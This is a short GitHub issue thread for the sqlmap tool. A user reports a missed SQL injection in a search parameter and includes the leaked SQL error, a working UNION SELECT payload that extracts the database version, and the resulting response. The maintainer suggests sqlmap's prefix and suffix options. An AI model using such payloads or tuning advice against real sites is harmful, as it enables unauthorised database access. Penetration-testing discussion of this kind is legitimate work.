### ISSUE TITLE
not injectable result but the target is injectable

### ISSUE THREAD

**Issue by div0x** [sqlmapproject/sqlmap#4298]
Hi,
thanks for your powerful tools.

i have a website that is vulnerable to sql injection the url is like :
https://www.site.com/file.php?op=search&format=json&q=asdaa'

and it response with json.

the query is this :
Error in query: SELECT * FROM db.TABLE1 WHERE ( name LIKE '%asdaa'%' AND public=1) LIMIT 20

sqlmap said it is not injectable ([WARNING] URI parameter '#1*' does not seem to be injectable)

but q parameter is injectable with this query : 
q=asdaa%') union all select version(),2,3,4,5,6,7,8,9,10,11,12-- AKyr

response:
[{"name":"asdaazsa","id":"724"},{"name":"4","id":"user@www.site.com"}]

if its possible, add this attack payload too <3

**Comment by stamparm** [comment]
You have the possibility to use `--prefix`, `--suffix` and `--string` to covert this case of yours. Nevertheless, I seriously doubt that sqlmap is not able to detect it as is
